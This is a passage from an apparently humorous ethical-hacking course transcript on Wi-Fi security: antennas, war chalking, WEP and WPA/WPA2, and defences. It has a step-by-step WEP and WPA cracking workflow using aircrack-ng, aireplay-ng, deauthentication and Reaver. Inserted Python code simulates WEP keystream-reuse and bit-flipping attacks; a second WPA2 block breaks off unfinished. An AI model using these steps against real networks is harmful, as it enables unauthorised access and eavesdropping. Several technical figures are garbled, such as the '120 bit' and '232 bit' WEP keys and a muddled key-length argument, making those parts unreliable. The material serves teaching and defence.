into the network. Again, so long as the session stays open or as long as the device remains within
range of the original access point. Now, shared key may look familiar to you because it's utilized
primarily for, duh dun dun, WAP. So, guess what folks, it's time to play Wireless Threat! Hey, I'm your
host Dale and my lovely assistant Julie here is going to help me out. So, here's the question, which
authentication process is the least secure? (sings dramatic beat) Is it open system or shared
key? (mimics buzzer) If you selected open system, you would be wrong. Shared key is actually a less
secure mechanism and the reason behind this is because the shared key is trans... It's shared, it's
transmitted. So, even though open system sounds like it's worse, we're going to use other types of
mechanisms to secure down the network. Thanks for playing, Bob tell them what they won! (funny
voice) You've won a brand new car!

Chalking

(normal voice) Okay, let's talk about chalking now. Some people call it war chalking. Other people
might call it hopscotch. No, not really. So, there are different ways we can identify networks. At least
wi-fi networks. We can do this by doing something called WarWalking. Where we have a mobile device
with us and we just simply walk around a building and it picks up access points and records information
for us. We also have something called WarFlying. This is a relatively new concept and I think with
drones it's going to get even more popular but back in my day they used model rockets. You know the
ones as a kid you'd shoot them they'd go right up in the air? There's some kids who attached a wi-fi
access point to one of them and shot it up. They picked up like a 15 mile range of wi-fi access
points, that it picked up as it went up and came back down. We also have something that's referred
to as WarDriving. You're in for a treat. In one of my other clips I want to take you actually on a
WarDriving outing. So, you guys can see how it can be done. Then we have something that's
called WarCrawling. This is where we put access points on babies and just let them loose. No, I'm
teasing. There's no such thing as WarCrawling. I just had four squares and needed to fill up the fourth
one. So, after we've identified those networks, we want to make sure we can share this
information. And that's actually where WarChalking came to play. Again, this may be a little bit of a
deprecated technology or concept because what we've done in the digital age. Most of the stuff now
is online. But it got its start, basically, back in 2002. By a gentleman by the name of Matt Jones, who
posted and promoted the idea on his blog. Of being able to leave behind marks that would help
identify networks to other people looking for wi-fi networks. It was inspired based off of the Great
Depression and the hobos. Or I should say the hobo community. Hobos themselves, when they
traveled, they communicated by leaving behind different marks that represented different things. So,
other hobos would know, for example, that it was okay to sleep someplace. Or that there was a doctor
that would help them. Or that there was a policeman nearby, who kept an eye out. And the hobos
would write this code with chalk or coal for the
brotherhood. You may be thinking, "Dale, that's a long time ago." Well, guess what, it's still being
utilized today. With wi-fi networks, to identify them, we use slightly different symbols. Let's
first start off by showing you what an open and closed node symbol would look like. I betcha can't
figure out which one's which. Open meaning, it's typically free. Closed meaning that it's locked down
somehow. And if it's locked down we need to identify the encryption that's used. So, either it's a WAP
encryption or it's a paid service. With the node identification at the bottom, we typically list the
speeds and above the representation of the node we would normally see the SSID. If by chance they
were doing any type of filtering, we would also use this symbol to identify that, in this case here, it's a
MAC filtered node. Now what's funny is that whenever I teach this concept usually I hear people
go, "Wow Dale, I've never seen any of these symbols around." Well, the problem is you haven't been
looking for them. Let me show you. So, what do you got here? You've got an open node that's
anywhere from one to five megabit and its SSID being Cadence. Here we actually captured
somebody showing an open wi-fi access point. Now this one here we have an open node that's called
Linxus, that's running at five megabit. Then we have another node, that's closed using WAP. It's also
five megabit and it looks like the SSID is a number. Here's an easy one. This is an open node, running
two megabit. It's actually running 802.11B and the SSID is tsunami. Which, hmm anyone know that
one? Yeah, that's the default SSID for a Cisco access point. Now, maybe next time when you're
walking down the street and you see some kids with laptops, playing with chalk, you might want to be
careful. Or pay attention to what they're drawing. I think these are actually Troy Hunt's kids. Now,
there's one symbol out there that you have to be very very careful about. I'm going to draw this one
out so you can take a look at it and see if you can guess what it is. Now, this one has some strange
characters, or lines drawn to it. There are some open and closed nodes associated to it. We often refer
to this one as a very secure... Wait a second. This symbol means, "Hey, guess who's nearby?" (sings
Batman theme song) I'll let you finish that one.

Antenna Types

So, let's talk about antenna types. Some of you guys may be familiar with only one or two of these. So,
I want to make sure that you understand these. It's kind of funny, after you study wireless, it's amazing
you'll start looking around as you drive and you'll start to see antennas that you never realized were
there before. They pop up in the strangest of places. When it comes to antennas, it's kind of like that
old saying, "Different strokes for different...uses?" Okay, yeah. Depending on what you're trying to
accomplish, will determine what type of antenna you'll want to use. Let's start with the traditional
one, that everybody knows about. It's called the omni-directional antenna. You've all seen something
that looks just like these, right? The big fat one there, we usually see in the back of our access
point. That first one there on the far left, that's actually a commercial grade access point, that we
typically install on top of a mast. Now, with omni-directional, it means that the signal is transmitted
360 degrees. By default it's broadcast out horizontally. Meaning that our beamwidth starts at the
antenna and moves in a horizontal direction. Now, because it's broadcasted in 360 degrees, if you
have certain amplitude on your antenna you actually lose power. So, an omni-directional antenna is
not as powerful as some of other types of antennas. I'll show you why. Before I do that, I want to show
you how an antenna's actually made. What's inside one of these things. I'm going to demonstrate this
by showing you just a picture of a pen. That would be the antenna itself and inside it's going to have
wire that's tightly wrapped around it. So, from here, the signal would go out horizontally. If you wanted
to have it go vertically. This is actually vertical polarized, omni-directional antenna. If you were to open
it up, I had one of these and I opened it up and I was really frustrated because I paid a lot of money
for it, thinking it was specially designed. All they'd done is taken the coil and instead wrapped it this
direction. Yeah, I paid like $300 for it. Really mad. Now, believe it or not, if these two antennas were
on the same channel, because they're broadcasting their signal vertically and horizontally, there's
technically a hundred degrees of separation between them. They won't have any interference. But
again, a weaker signal. Then say, for example, a directional antenna. This is a commercial directional
antenna. You'll notice it's flat. Inside you have the same concept, as an omni-directional, they just
added something special. Now normally when you buy directional antennas you have the option of
buying them in various degrees. A 45, a 90, or 180 degree antenna. They're more powerful than
omni-directionals because of this reason. Let's say that this is a bird's eye view of the top of the antenna
inside of this particular antenna on the left. Well, we know that the signal will go out in a 360 degree
pattern. Well, instead if I take that antenna and encase it, all we have to do is put something in
there that's highly reflective. Remember we talked about reflection earlier? Most of the time, it's just
sheet metal. So, that sheet metal takes the signal that hits it, and what ends up happening is that when
that signal hits that sheet metal, it actually reflects it and pushes behind the signal that's already going
in that other direction and actually amplifies. It's actually kind of a cool concept when you think about
it. Something so simple. Now, think about that for a second. A lot of times I have students ask
me, "Dale, what's the best way to deploy a wireless "in a work environment?" Well, most of the time
IT guys will go through and say, "Okay, I want to find my centralized "location and I want to make sure
I get the "best signal, so I'm going to put it right smack "in the center and let it broadcast out "the
signal." That includes going all the way out to the parking lot, where an attacker might be sitting and
waiting. Or listening in. Instead, my own personal best practice is, is if my parking lot is on that north
side of the building, I'll actually place my wi-fi access point, in the corner. By the way, I'd also put my
access points up inside of a drop ceiling. Or try to hide them, so they can't be seen. So, when someone
is casing the joint, they don't know that there's an access point there. But up inside that plenum area, I
would actually put a couple pieces of sheet metal up there. So that, what you just learned, the signal's
going to get amplified and not overflow into the parking lot area. Obviously my signal's going to go
stronger in there or possibly even further to the bottom right hand corner and hopefully they don't
have a parking lot there. But again, if I'm worried about it, I might put some sheet metal down in that
corner as well. Or just build my whole building out of sheet metal. I believe we refer to those as army
barracks, right? We also have another type of antenna, that's called a parabolic grid. This is what they
look like. You may have seen these quite often. You have your transmitting element, in the center
there, and the grid portion is actually pushing as well as receiving, almost like a big satellite
dish. Receiving this signal and focusing it back to that center arm. These are more powerful than omni
antennas as well. They're typically used for long distances. Like 10 plus miles. Back in my day we
actually had, this was a 25 dB parabolic grid antenna, we also had smaller ones that were 15 and 5. To
give you a better visual representation of what the grid is doing. This is a chart for that particular
antenna. Showing you how the grid helps to focus or they call it, using directors, to make the angle
smaller. Therefore you get a higher amplification or a higher gain out of it. Another type of antenna
that you might see out there is called a yagi. This is what the yagi looks like. This is used for extremely
focused connectivity. With a parabolic antenna you can be within a couple of
degrees and pick up the signal, but with a yagi, man, you've got to be smack dead on. Again, huge distances
for these particular types of antennas. What happens here, or the mechanics of a yagi, is this. The
reason why they look so weird is that first of all you have what they refer to as the driven element. This
is where the microwave signal comes up off the access point and starts to get pushed out onto the
yagi. This back pole here, this is referred to as the reflector. Just like what we saw in the parabolic
grid antenna. It's designed to push the signal back forward. The reason why the bars up front are
smaller, these are referred to as directors, is because it helps to focus that microwave wave. Can I say
that? Microwave, wave. I'll just shorten it up. It's there to focus that microwave so that it takes a
smaller pattern and therefore it's able to go longer distances and possibly pop more popcorn. You
think I'm kidding, so a real world story here. When I had my ISP and we were up on top of that really
tall water tower, have I told you how much I hated that thing? I was actually up there once during a
fog and ice storm. So, I'm on top of the tower, it is so cold that the fog is turning to ice on the hand
rails and it's dark. So, I can't see beyond the top of the water tower. I can't see my assistant down on
the ground. When it got cold like that, first of all, getting back down was really fun, it was the thrill of
my life. But when it was winter and anytime it was cold if your hands got cold up there, or if your
gloves got wet, you could just simply place them in front of the antenna and you'd get warm. (funny
voice) Dale, that sounds dangerous. (normal voice) It really isn't because even though it is a microwave
technology you have to think we're surrounded by this stuff and it's such a low frequency, it's not like
putting your hands in a microwave oven. If it was, I would have taken a turkey up there with me and
cooked a little dinner while I was up there.

Summary

So, in this module, man we talked about a lot of stuff. We first started off with talking about new terms
to learn. We talked about BSSID. We talked about frequency hopping. Famous Hollywood starlet, Hedy
Lemarr, who helped invent wi-fi or the spread spectrum technology. We talked about DSS and what a
SSID was. We then talked about the advantages and disadvantages of wi-fi. Cost savings,
absolutely. Well, unless you're buying a ton of new equipment but even the man hours to run
wiring can be a real pain in the cahootski. Again, the disadvantages being that security is our top
priority, as well as bandwidth. We then went through and took a look at different types of wi-fi
networks. Remember we had extensions for networks? We also had lan to lan networks. Multiple
access point networks and then of course the cellular access networks. After that, we talked about
wi-fi standards. In that we discussed line of sight theory as well as the Fresnel zone. We also talked about
some of the standards, we showed you the graph of the different 802.11 standards. Their speeds and
their frequencies. We then went through and talked about the wi-fi authentication modes. Being both
open and shared. Even though open sounds less secure. Shared key is actually less secure because of
the key is transmitted. We then went through and talked about chalking. How attackers use a simple
low tech device, like a piece of chalk to leave behind identification markings to help other
attackers know what's near by. Again this is kind of being deprecated because most of this now is
tracked with online services through the sharing of digital information. We then went through and
took a look at the different antenna types. Remember we had omni-directional, that gives us 360
degrees of coverage not very far distances. We also talked about horizontal and vertically polarized
antennas. As well as yagi, sector based antennas. And parabolic grid antennas. So, now that we've got
the foundation for wireless, in the next module, we're going to talk about encryption.

Encryption in Wireless

Encryption in Wireless

The yellow duck has a blue umbrella. You guys don't know that code? I don't understand why you
wouldn't. Oh, 'cause it's encrypted. You'll never guess what we're going to talk about in this
module. Yeah, it's how to encrypt wireless. So we've gone through and we've deployed our wireless
environment. How do we make sure the things are still secure? Well, just like all my other modules I
need to start off with a quote, and this quote is a very famous quote by a very famous Pluralsight
author. I believe he goes by the name of SuperDale, and he said, oh wait, my message is
encrypted. Here, let me decrypt that for you. This is actually a saying that I've come up with and I use
it quite often. That is: "Once we've identified our weakness, "we'll have strength and that's when we
get dangerous!" And that is so true. Again, I talk about this all the time that knowing is, quote, G.I. Joe
again, knowing is half the battle and understanding what your weaknesses are helps to strengthen
you. So in this module we're going to go through and take a look at some basics when it comes to
wireless encryption. If you want to get deeper, I recommend some other Pluralsight courses on
cryptography that would help you out. But we'll start off by first taking a look at an encryption method
that, hopefully, you're not using but it was better than nothing, it was called WEP. Then we'll go
through and take a look at what we refer to as WPA and WPA2 encryption. And since this course is
about protecting wireless we'll look at how we can break the encryption. And then, if you know me, I
don't like to leave you hanging, we'll actually go through and look at defending against the cracking of
Wi-Fi networks. So, break out your Little Orphan Annie decoder rings because I'm going to start getting
into encryption (slurred speech) is just really smart. Oh, obviously, you didn't
have your encryption ring on yet, huh?

WEP Encryption

So let's talk about WEP encryption. Believe it or not, WEP encryption is still heavily used, but let's not
even pretend here. WEP does stand for Wired Equivalent Privacy, but, it's not. But initially that was its
goal. And we'll talk about why they didn't achieve that goal when they implemented this or when this
got ratified. But it was designed to also protect us from eavesdropping. No, I'm not talking about
somebody looking over your shoulder, but digital eavesdropping. It was designed to help us make
sure that our data was protected. It also was there to help us to make sure that we prevented anybody
from getting on the network via Wi-Fi without being authorized to do so. And in order to prevent
unauthorized access and eavesdropping, it uses a key, and the key is the key. That's the problem, is
that the key is used to encrypt the packets before transmission, but this key is shared, which makes it
kind of a nightmare for us. So what's the goal? Well, the goal for WEP was, again, to control access, as
well as make sure that we can maintain confidentiality. This is what actually would help prevent
link-layer eavesdropping, or that digital eavesdropping that we talked about earlier. Its other goal
was for data integrity, making sure that nobody changed the data during transmission. And it was
supposed to bring us a level of efficiency. Anytime you start implementing encryption, you have a
tendency of slowing down the process or the data being transmitted. So, the goal here was to make it
somewhat streamlined. Dale, so what happened? Well, this is what happened. First of all, when they
came up with WEP, it was not reviewed by any academia, or any type of public review for any type of
input. Nor were any cryptologists able to review this technology. Back in the day we were so
desperate to get some type of encryption, there was almost like somebody threw something
together thinking that it was going to work. As I mentioned before, one of its biggest downfalls is the
pre-shared key issue. Back in 1999 is when it got ratified and the first version of WEP wasn't really
that strong. And one of the reasons why it wasn't that strong was because the issue that we had with
US restrictions on the export of various cryptography technologies actually led a bunch of
manufacturers restricting their devices to only 64 bit encryption. But WEP only used a 40 bit key. When
the restrictions were lifted, it was increased to 120 bit, but again, WEP ended up only 104 bit key size. And
even though they came out with 256 bit WEP encryption, which only uses its 232 bit key size, 120 bit
still remains one of the most common implementations today. And the other issue has to do with the
fact that WEP used RC4 algorithm for its encryption. The problem is that RC4 is designed for
randomized keys to be encrypted, but WEP isn't random at all. You create one shared key and it's the
same for everybody. The end result is that WEP can be cracked if enough traffic can be intercepted. So,
as the passphrase grows or somebody increases it, the time that it takes to crack it grows
linearly. When it grows exponentially, it causes a key that's 41 bits in length to take twice as long as a
40 bit key. With WEP you would need to increase the key size from 40 to 80 bits just to double what
it takes to find the key. So, technically this means that 104 bit WEP key provided no significant practical
advantage over 40 bit key. Now, I'm not here to say that WEP is totally garbage. I would much rather
use WEP than nothing at all. But please, if you're using it anywhere, turn it off. Or if you're not going
to turn it off, let me know the address of your access point. I think I'd like to come visit you.

WPA & WPA2 Encryption

So let's start with WPA. WPA is kind of like WEP all grown up. Who put on his big boy pants? Well, that
was what it's designed to do. It's short for a Wi-Fi Protected Access and it definitely gives better
protection than what we experienced with WEP, and it was formally adopted back in 2003, which was
about a year before WEP was officially retired. So it was designed to patch the issues that we had with
WEP. Now, the most common WPA configuration is using WPA-PSK. That's short for pre-shared
key, and this key is 256 bit which is much stronger than the 64 bit and 128 bit keys that we saw with
WEP. Now, one of the biggest changes of implementing WPA included a message integrity check, and
what we mean by that in non-geek terms is the ability to check to see if an attacker or somebody had
captured or altered the packets as it was passing from the access point to the client. And we do that
with something called Temporal Key Integrity Protocol, also known as TKIP. Er, Dale, what's TKIP? Well,
under TKIP a client starts with 120 bit temporal key that is then combined with the client's MAC
address. Once the TKIP has been created, it wraps itself around WEP because that's all WPA is, is fixing
WEP. And then, unique encryption keys are then created for each wireless frame which creates a more
secure network connection. However, despite the improvement the WPA gives us over WEP, the ghost
of Christmas past, no, the ghost of WEP still haunts WPA. Now, the really cool thing about WPA back
in the day is that it didn't require you to go off and buy new hardware. It was simply a firmware upgrade
on the networking devices, but here is the downside to it. Because it had to recycle certain elements
used in WEP, it actually ended up creating exploits. In fact, today WPA by itself is not considered
secure, just like W-E-P, or WEP. So then along came our big brother, WPA2. WPA2 created much
stronger protection for us. And one of the reasons for this was the mandatory use of AES algorithms
and something called CCMP, or Counter Cipher Mode and Block Chaining Message Authentication
Code Protocol. Yeah, nothing in your immediate future on that one. It was just a new algorithm that
replaced TKIP. Now, WPA comes in two different flavors. The first one is referred to as WPA-
Personal. It uses a pre-shared key. It does use a 256 bit key for encryption. And then encryption is
based off of anywhere from 8 to 63 ASCII Characters. You all have probably set up an access point
before where you've gone through and you've created a passcode, or a passphrase for your wireless
network. Well, it's those characters that are used to help create that 256 bit key. Well, gee, Dale, it
sounds like if I'm using WPA2, I'm doing pretty good. Yeah, guess again. Some of the
vulnerabilities that were the big hole in WPA armor exist with WPA2, and here it is. And if you guys,
on your Wi-Fi routers, are using WPS. Dale, that's too many acronyms, I can't keep record of all of
them. WPS is that Wi-Fi Protected Setup. It's that little button. All you got to do is hit this button and
you'll get your device to hook right up. Well, WPS is burned into the firmware. It doesn't change or
rotate, it's a code. Now I could still try to break into your WPA2 network by using brute-force attacks
and that could take anywhere from several hours to a couple of days, maybe even a week. But if I go
after your WPS, this vulnerability can be hacked by some software called Reaver, and I can crack that
anywhere from two to 14 hours, depending on my system. So, if you can, try to disable WPS. The other
flavor of WPA2 is referred to as WPA2-Enterprise. Now, WPA2-Enterprise addresses the
concerns regarding the distribution and managing of those static passphrases. It's actually the control
access on a per account basis by tying into some type of authentication service. Those are typically
handled by either EAP or RADIUS, and this mode requires credentials, such as a user's name, a
certificate, maybe a one-time password, and the authentication occurs between the station and this
centralized authenticating server. The access point or the wireless controller simply monitors the
connection and directs the authentication packets to the authentication server. Typically, this is going
to be a RADIUS box. Now, this is all based off of the enterprise environmentusing AES with CCMP,
which is extremely strong compared to RC4. Now, to show you what this looks like, let's take a look at
the workings of 802.1x. This framework supports both user and machine authentication with port
based controls that worksfor both wired switches and wireless access points. Now, the major
components involved in this are the supplicant, which would be the devices we're trying to gain access,
with the authenticator which is typically an access point. But if you're using a centralized access point
architecture, it could be on a switch or a controller, and this is in charge of authenticating the clientto
the network. And the other component is the authentication server. Now, it can't be just any
authentication server, it has to be an authentication server that supports EAP, or I should it's
compatible with EAP, and it has to be the EAP that comes on the supplicants. Now, typically the
authenticator processes requests from the supplicant and leaves the interface blockedunless it's
directed by the authentication server to let it through, and the authentication server receives and
processes authentication requests that it gets from the authenticator, the access point, using a
somewhat extensive process. So, in this case, when the access point receives EAP traffic from the
client, it converts it and sends it to the RADIUS server. After the authentication process starts, the
client receives what we refer to as a master key, or an MK. Now, the master key is tied to that
authentication session. Now, since both the authentication server and the supplicant have the master
key, they both generate what we refer to as a primary master key, or a PMK. Now, the access point
receives a PMK from the authentication server through some RADIUS attributes that you would
assign. Once the client and the access point have the PMK, the client and the access point generate
something known as a pair-wise transient key. And the reason why they both generat it is because we
don't want to exchange it across the Wi-Fi, which eliminates a man-in-the-middle attack. Now,
because the process of a client authenticating to a RADIUS server can take hundreds of
milliseconds, not seconds, milliseconds, but believe it or not, it's long enough that a device, like a
phone or a laptop, it's unacceptable. So, most enterprise wireless products that have 802.11i features
have things built into them, like PMK caching, as well as pre-authentication. So you can see that there's
a lot of keys involved with this interaction. So much so that you may have to involve Vinz Clortho,
Keymaster of Gozer. Anybody? Anybody? Okay, homework assignment: go watch Ghostbusters.

Breaking Encryption

So, if things are encrypted, how do we break that encryption? Well, that's going to depend again on the type of encryption that you're using. When it comes to WEP, one of the biggest issues that we have is the weak initialization vectors that are up there, or IVs. And there's got to be a hospital joke there somewhere, right? IVs? No? Okay. So let's talk about some of the initialization vector problems that WEP has. First, the fact that it uses RC4. Now, RC4 itself isn't the whole problem, it's how WEP uses RC4. WEP takes a 24-bit IV, prepends it to the shared key, and feeds that combination into RC4's key scheduling algorithm, or KSA, to produce the keystream for each packet. And the IV itself is sent in clear text at the front of every packet, so yeah, I always know which IV was used, and for a class of "weak" IVs the first bytes of keystream leak information about the key. Therefore, if I intercept enough traffic with WEP, I'll be able to figure out what your key is. The other issue is that the standard doesn't say how IVs have to be chosen, so they get reused over and over on your devices, and two packets encrypted under the same IV share the same keystream. So if you get one key, you have everything, kind of like one ring to rule them all. Another weakness is that the IV itself is prepended to the beginning of the secret key, which makes it vulnerable to what we refer to as FMS attacks. The acronym comes from the last names of the three gentlemen that came up with the paper, Fluhrer, Mantin and Shamir, back in 2001. It takes advantage of the weaknesses in the RC4 key scheduling algorithm to go through and reconstruct the key byte by byte from those weak-IV packets, and we do this with simple scripts. It's so simple, in fact, a lot of the tools that we use for hacking wireless networks, like Aircrack and AirSnort, actually have the ability to exploit this type of weakness. Another weakness is the fact that there's really no reliable way to detect that the message has been tampered with. Now, there is an integrity check, the CRC-32 checksum value, or ICV, but it has its own drawbacks: the CRC is linear, so an attacker can flip bits in the encrypted packet and fix up the checksum without ever knowing the key. And probably one of the most critical weaknesses is the use of what we refer to as short initialization vectors. With only 24 bits there are about 16.7 million IVs, so basically, within a few hours of traffic, in fact, nowadays I can actually generate the traffic to speed the time frame up, the same IV will repeat itself, and I can see those repeats using sniffing tools, capture the encrypted packets that share the same IV and therefore the same keystream, and then use a tool, like Aircrack and/or WEPCrack, to exploit the weak IVs. Which would then, obviously, give me the base key, and again, the base key is the base key for everyone. So, knowing that these initialization vector weaknesses exist, it's very easy to crack WEP. There are several tools out there, but they all basically do the same thing. You'll first want to make sure that you start up the wireless interface in what we refer to as "monitor" mode on the specific access point's channel. Once we do that, we need to then check to see if the access point allows for the injection of packets. If it does, I'm then going to use a tool, such as aireplay-ng, to do a fake authentication with the access point, so that the AP considers my card's MAC address associated and accepts the packets I inject. Now, any type of injection is going to fail if my MAC address has not associated with the AP, so if fake authentication doesn't work, the alternative is to sniff for a MAC address that's already associated and use that as my source address. Then I'll end up starting up a sniffing program, airodump-ng, and grab as many IVs as I possibly can. Well, at least enough to break the base key. So, in order for me to get a hold of a bunch of IVs in a short period of time, I'm just going to turn on aireplay-ng again in what we refer to as ARP request replay mode, which listens for ARP requests and then reinjects them back into the network. The access point rebroadcasts the packets, encrypting each one under a new IV. Meanwhile I'm collecting those, and then I take them in and start cracking, using Cain & Abel or, again, the tool that you've seen being used quite a bit here, aircrack-ng, whichever one you're more comfortable with. Now, because WPA is basically a grown-up version of WEP, it does make it a little bit tougher, but we can still brute-force attack it if I'm able to capture the right packets. And if you're not familiar with a brute-force attack, I highly recommend going back and watching the ethical hacking course on hacking the system. Same thing with doing an offline attack. In order to implement this, we have to be near the access point only for a matter of seconds in order for us to capture the WPA or WPA2 authentication handshake. By capturing the right packets, the four-way handshake, we can then try to crack this offline. And if you remember from our course on offline attacks, that's the biggest advantage that an attacker has, is time. I don't have to sit there and be on your network constantly. And if you want to get really tricky, we do something called a de-authentication attack, and this is where I go "Dang!" Because what this does is I'll go through and find an active client, and I'm going to force the client off, or to disconnect, from the access point. Then I'm going to use some of my cool tools to capture the handshake packets when the client tries to rehook up to the access point, which happens within just a few seconds of it being disconnected. Now, that handshake doesn't carry the pairwise master key, the PMK, itself; it carries the two nonces and a message integrity code computed with a key derived from the PMK. But that's enough: I can take a candidate passphrase, derive the PMK and the transient key from it, and check it against that integrity code, so I can dictionary attack or brute-force it offline to recover the WPA key. So, just like WEP, we can brute-force the WPA keys. The tools that we utilize for this process include things like Aircrack, KisMAC, and Reaver. If you remember, Reaver is actually used to attack the WPS PIN, but that's only if you have an RSVP with a PDQ. Okay? Yeah, I got you with acronyms, didn't I?
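The WEP weaknesses walked through above (the cleartext IV, keystream reuse when an IV repeats, the 24-bit IV space, and the linear CRC-32 that lets a bit-flipping attack pass the integrity check), modelled in runnable Python as an added example; this is not code from the course or from the aircrack-ng suite. The 40-bit key, the IV, the ARP request and the "secret" frame are all constructed for the demo, RC4 is implemented inline so it runs offline, and the frame layout follows WEP's IV || key-id || RC4(IV||key)(data || ICV):

```python
"""WEP keystream reuse and bit-flipping, modelled in code.
Added example, not from the course: the 40-bit key, IVs and frame contents are
constructed for the demo, not captured from any network. RC4 is implemented
inline so it runs offline. Frame body layout follows WEP:
IV (3 bytes) || key-id byte || RC4(IV || key) XOR (data || CRC-32 ICV).
"""
import zlib
from math import exp

KEY = bytes.fromhex("0badc0ffee")              # constructed 40-bit WEP key (never seen by the attacker)
SNAP_ARP = bytes.fromhex("aaaa030000000806")  # LLC/SNAP header that precedes every ARP payload
# A full ARP request (constructed): hw/proto types, lengths, opcode, sender MAC/IP, target MAC/IP.
ARP_REQUEST = SNAP_ARP + bytes.fromhex(
    "0001080006040001" "001122334455" "c0a80102" "000000000000" "c0a80101")


def rc4(key: bytes, length: int) -> bytes:
    """RC4: key scheduling (KSA) then keystream generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32(data: bytes) -> bytes:
    return zlib.crc32(data).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """The IV is prepended to the key for RC4 and sent in the clear in front of the frame."""
    body = data + crc32(data)
    return iv + b"\x00" + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Receiver side: returns the data, or None when the CRC-32 ICV check fails."""
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4(iv + key, len(body)))
    data, icv = plain[:-4], plain[-4:]
    return data if crc32(data) == icv else None


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Stream-cipher weakness: ciphertext XOR known plaintext = the keystream for that IV."""
    return xor(frame[4:4 + len(known_plaintext)], known_plaintext)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Any other frame sent under the same IV decrypts with the recovered keystream, no key needed."""
    return xor(frame[4:4 + len(keystream)], keystream)


def iv_collision_probability(frames: int) -> float:
    """Birthday bound for random 24-bit IVs: probability that some IV has repeated after n frames."""
    return 1.0 - exp(-frames * (frames - 1) / (2 * 2 ** 24))


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Bit-flipping without the key: XOR delta into the encrypted data and fix the encrypted ICV.
    CRC-32 is affine, crc(p ^ d) = crc(p) ^ crc(d) ^ crc(zeros), so the ICV correction
    depends only on delta, never on the plaintext or the key."""
    n = len(frame) - 4 - 4                      # data length: strip IV/key-id header and ICV
    delta = delta.ljust(n, b"\x00")
    icv_fix = xor(crc32(delta), crc32(bytes(n)))
    return frame[:4] + xor(frame[4:], delta + icv_fix)


def demo() -> dict:
    iv = bytes.fromhex("a1b2c3")               # one of only 2**24 possible IVs
    # 1. Keystream reuse: the AP encrypts a predictable ARP request under this IV ...
    arp_frame = wep_encrypt(KEY, iv, ARP_REQUEST)
    keystream = recover_keystream(arp_frame, ARP_REQUEST)
    # ... and later a secret frame under the same IV. The attacker reads it without KEY.
    secret = SNAP_ARP[:6] + b"\x08\x00" + b"GET /admin?token=hunter2"
    leaked = decrypt_with_keystream(wep_encrypt(KEY, iv, secret), keystream)[:len(secret)]
    # 2. Bit-flipping: change the ARP target IP 192.168.1.1 -> 192.168.1.9 inside the
    #    encrypted frame. The receiver's ICV check still passes.
    delta = bytes(len(ARP_REQUEST) - 1) + bytes([0x01 ^ 0x09])
    tampered = wep_decrypt(KEY, flip_bits(arp_frame, delta))
    return {"leaked": leaked, "tampered": tampered,
            "p_repeat_after_5000_frames": iv_collision_probability(5000)}


if __name__ == "__main__":
    print(demo())
```

The birthday figure is why ARP request replay works so well: the attacker does not need 16.7 million frames, because with random IVs a repeat is more likely than not after about five thousand, and every forced retransmission is another IV spent. The bit-flip half is the reason the section above says the checksum "has its own drawbacks": the ICV is encrypted, but the correction the attacker needs depends only on which bits were flipped.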

Defending Against Cracking


Okay, Dale, so what you're saying is we should just never use Wi-Fi. Well, no, that's not really what I'm saying. Because we can do some things to defend ourselves against cracking on wireless. Again, I go back to the same statement I made in Understanding Ethical Hacking, and that is, there's nothing that is completely secure, but knowing what your risks are helps to make you stronger or safer. I mean, I have a really high chance of being killed in a car accident if I drive, but that doesn't mean I'm going to stop driving. I know what my risks are and, therefore, I'm going to do things like wear my safety belt. I'm going to drive defensively. But Dale, I'm really scared. I know, I know. But let's talk about how implementing some very basic things that we should already be doing, but people just have this tendency of overlooking them, can actually help you in securing down your wireless network. The first thing would obviously be our passphrases. We've talked about those passphrases, and remember, the PMK is derived from them, so a guessable passphrase means a guessable PMK. If you make the passphrases in WPA complicated, make them not only complicated but also, remember, we go back to talking about the length of our passwords? Get a passphrase in there that's at least 20 characters long, if not longer, and do me a favor. And remember, when creating these passphrases, follow the same guidelines that we had with passwords. Don't use real words that could be found in a dictionary, because the attack on a captured handshake is an offline dictionary attack, and it only succeeds if your passphrase is in the attacker's list. And then, in an enterprise environment, I would actually look at the process of changing the passphrases at least once a year. Another option that you can do is look at some of the additional controls that are provided to us already. Are you using a VPN? What about NAP? For those of you who are not familiar with NAP, it's Network Access Protection, Microsoft's version of network access control, and it gives me additional control over end-user connectivity. So think kind of outside the box. And then lastly, look at the client settings. Use WPA2 with AES and CCMP encryption only. Also, when it comes to the client settings for 802.1X, make sure you validate the authentication server's certificate and pin it to a specific server name and a trusted CA. I know that sometimes we try to take shortcuts or use automation by saying, hey, trust whatever authentication server answers. Well, don't do that, 'cause you're just asking for someone to fire up an evil twin with its own authentication server. Oh, evil twin. We'll talk about that in another module coming up here. Mwa ha ha ha ha!
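The passphrase advice above, and the handshake capture and offline cracking described in Breaking Encryption, come down to one key hierarchy, shown here as an added example in Python; this is not code from the course, from aircrack-ng or from any other tool. It derives the 256-bit PMK from a passphrase the way WPA2-Personal does (PBKDF2-HMAC-SHA1 with the SSID as salt), expands it into the PTK with the nonces and MACs from the four-way handshake, computes the message 2 MIC a sniffer would capture, and then runs the offline dictionary attack against that capture. The SSID, passphrase, MAC addresses and nonces are constructed for the demo; the EAPOL-Key layout follows IEEE 802.11i for CCMP with the RSN IE left out of the key data. In WPA2-Enterprise only the first step changes: the PMK comes from the EAP exchange instead of a passphrase, so there is nothing in the handshake to run a wordlist against.

```python
"""WPA2-Personal key derivation, the four-way handshake MIC, and the offline
dictionary attack against a captured handshake.
Added example, not the course's or any tool's code: SSID, passphrase, MACs and
nonces are constructed for the demo. Only the EAPOL-Key fields needed for the
MIC are modelled; the layout follows IEEE 802.11i (RSN descriptor, CCMP,
HMAC-SHA1-128 MIC).
"""
import hashlib
import hmac

MIC_OFFSET, MIC_LEN = 81, 16      # Key MIC field position inside the EAPOL frame
SNONCE_OFFSET = 17                # Key Nonce field position


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
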